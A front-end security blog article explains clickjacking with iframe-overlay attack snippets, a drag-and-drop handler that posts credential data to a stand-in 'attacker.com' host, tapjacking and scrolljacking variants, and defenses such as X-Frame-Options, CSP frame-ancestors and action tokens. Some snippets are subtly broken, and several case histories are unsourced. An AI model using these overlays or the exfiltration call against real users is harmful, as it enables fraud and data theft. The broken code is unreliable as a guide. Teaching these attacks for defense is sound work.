阿里云主机折上折
  • 微信号
Current Site:Index > The dangers of clickjacking

The dangers of clickjacking

Author:Chuan Chen 阅读数:52780人阅读 分类: 前端安全

Basic Principles of Clickjacking

Clickjacking is a visual deception attack method. Attackers overlay a transparent or disguised iframe layer on top of a target webpage, tricking users into clicking seemingly harmless interface elements that actually trigger malicious actions in the hidden frame. This attack exploits CSS transparency properties and z-index stacking features, completing the operation entirely without the user's awareness.

Typical attack scenarios include:

  • Fake social media "like" buttons overlaid on gaming interfaces
  • Bank transfer confirmation buttons hidden beneath fake lottery pages
  • Admin privilege operation interfaces embedded in phishing email content
<!-- Basic clickjacking example -->
<style>
  .malicious {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    opacity: 0.01;
    z-index: 100;
  }
  .decoy {
    position: relative;
    z-index: 1;
  }
</style>

<div class="decoy">Seemingly safe button</div>
<iframe class="malicious" src="https://victim-site.com/transfer?amount=1000"></iframe>

Primary Forms of Harm

Account Privilege Hijacking

When user login sessions remain active, attackers can induce users to perform sensitive operations. A case occurred on an e-commerce platform where attackers hid a "confirm receipt" iframe beneath a promotional page. Users clicking "claim coupon" actually confirmed receipt of goods they hadn't received.

Social Engineering Amplification

Combined with social platform sharing features, clickjacking can achieve viral propagation. In Facebook's 2010 "Likejacking" attack, transparent iframes overlaid on "watch video" buttons caused users to unknowingly share malicious content.

Cross-Device Synchronization Attacks

Modern web applications often maintain logged-in states across multiple devices. Attackers can induce clicks on mobile devices to trigger high-risk operations in the user's logged-in PC environment. A banking app vulnerability allowed large transfers via clickjacking, even if users had never logged into online banking on mobile.

Composite Attack Escalation

Clickjacking often serves as an entry point for compound attacks:

  1. First obtain partial privileges through clickjacking
  2. Combine with CSRF to complete the attack chain
  3. Use DOM Clobbering to bypass certain protections
// Example combining keylogging
document.addEventListener('click', (e) => {
  const fakeCursor = document.createElement('div');
  fakeCursor.style.position = 'absolute';
  fakeCursor.style.left = `${e.clientX}px`;
  fakeCursor.style.top = `${e.clientY}px`;
  document.body.appendChild(fakeCursor);
});

Real-World Case Analysis

Twitter Historical Vulnerability (2018)

Attackers created seemingly harmless "show more" buttons with hidden iframes beneath that followed specific accounts. User clicks automatically followed spam accounts, causing mass propagation. Exploit code:

<button style="position: relative; z-index: 1">Show more tweets</button>
<iframe 
  src="https://twitter.com/follow?user=attacker"
  style="position: absolute; width: 100px; height: 50px; opacity: 0; top: 0; left: 0; z-index: 2">
</iframe>

Online Document Editor Vulnerability (2020)

A collaboration platform had clickjacking risks where attackers could construct specific pages to trick users into clicking, modifying document sharing permissions. The attack involved multi-layer iframe nesting:

<div class="fake-ui">Click here to view document history</div>
<iframe src="share-dialog" class="hidden-frame"></iframe>
<script>
  setTimeout(() => {
    document.querySelector('.hidden-frame')
      .contentDocument.getElementById('public-share').click();
  }, 300);
</script>

Defense Technology Implementation

Client-Side Protection Measures

X-Frame-Options remains fundamental but requires proper configuration:

# Nginx configuration example
add_header X-Frame-Options "SAMEORIGIN";
add_header Content-Security-Policy "frame-ancestors 'self'";

Modern browser-supported CSP offers more flexible protection:

<meta http-equiv="Content-Security-Policy" content="frame-ancestors 'none'">

Server-Side Verification Enhancement

Critical operations should implement secondary verification:

// Verify user interaction before sensitive actions
function confirmAction() {
  const rect = document.getElementById('confirmBtn').getBoundingClientRect();
  const isHuman = (
    event.clientX >= rect.left &&
    event.clientX <= rect.right &&
    event.clientY >= rect.top &&
    event.clientY <= rect.bottom
  );
  if (!isHuman) return false;
}

Visual Obfuscation Techniques

UI solutions against automated clickjacking:

.confirm-dialog {
  transform: rotate(0.5deg);
  position: fixed;
  animation: jitter 0.1s infinite;
}
@keyframes jitter {
  0% { transform: translate(0, 0); }
  25% { transform: translate(1px, 1px); }
  50% { transform: translate(0, 1px); }
  75% { transform: translate(1px, 0); }
}

Emerging Attack Variants

Drag-and-Drop Hijacking

New attacks exploiting HTML5 drag-and-drop API:

document.addEventListener('dragstart', (e) => {
  if (e.target.id === 'credential-file') {
    fetch('https://attacker.com/steal', {
      method: 'POST',
      body: e.target.data
    });
  }
});

Tapjacking

Mobile device variant attacks:

<div class="fake-button">Install update now</div>
<iframe 
  src="malicious-app://install"
  style="touch-action: none; pointer-events: auto">
</iframe>

Scrolljacking

Combining scroll events to trigger malicious actions:

let scrollCount = 0;
window.addEventListener('scroll', () => {
  scrollCount++;
  if (scrollCount > 3) {
    document.querySelector('iframe').contentWindow.submit();
  }
});

Enterprise-Level Protection Solutions

Behavior Analysis Systems

Deploy front-end behavior monitoring:

const suspiciousPatterns = {
  rapidClicks: 0,
  lastClickTime: 0
};

document.addEventListener('click', (e) => {
  const now = Date.now();
  if (now - suspiciousPatterns.lastClickTime < 50) {
    suspiciousPatterns.rapidClicks++;
    if (suspiciousPatterns.rapidClicks > 3) {
      triggerDefense();
    }
  }
  suspiciousPatterns.lastClickTime = now;
});

Dynamic Token Verification

Binding critical operations to temporary tokens:

// Generate action token
function generateActionToken() {
  const token = crypto.randomUUID();
  document.cookie = `action_token=${token}; SameSite=Strict`;
  return token;
}

// Verify token
function verifyAction(token) {
  return document.cookie
    .split('; ')
    .find(row => row.startsWith('action_token='))
    ?.split('=')[1] === token;
}

Hardware Feature Binding

Advanced protection solution example:

// Get device fingerprint
async function getDeviceFingerprint() {
  const canvas = document.createElement('canvas');
  const gl = canvas.getContext('webgl');
  const audioContext = new AudioContext();
  // ...Extract hardware features
  return fingerprint;
}

// Bind operation to device
async function secureAction() {
  const fp = await getDeviceFingerprint();
  const storedFP = localStorage.getItem('device_fp');
  if (fp !== storedFP) throw new Error('Device mismatch');
}
做个网站!

本站部分内容来自互联网,一切版权均归源网站或源作者所有。

如果侵犯了你的权益请来信告知我们删除。邮箱:cc@cccx.cn

上一篇:点击劫持的常见攻击方式

下一篇:防御点击劫持的方法(如 X-Frame-Options)

Front End Chuan

Front End Chuan, Chen Chuan's Code Teahouse 🍵, specializing in exorcising all kinds of stubborn bugs 💻. Daily serving baldness-warning-level development insights 🛠️, with a bonus of one-liners that'll make you laugh for ten years 🐟. Occasionally drops pixel-perfect romance brewed in a coffee cup ☕.

相关文章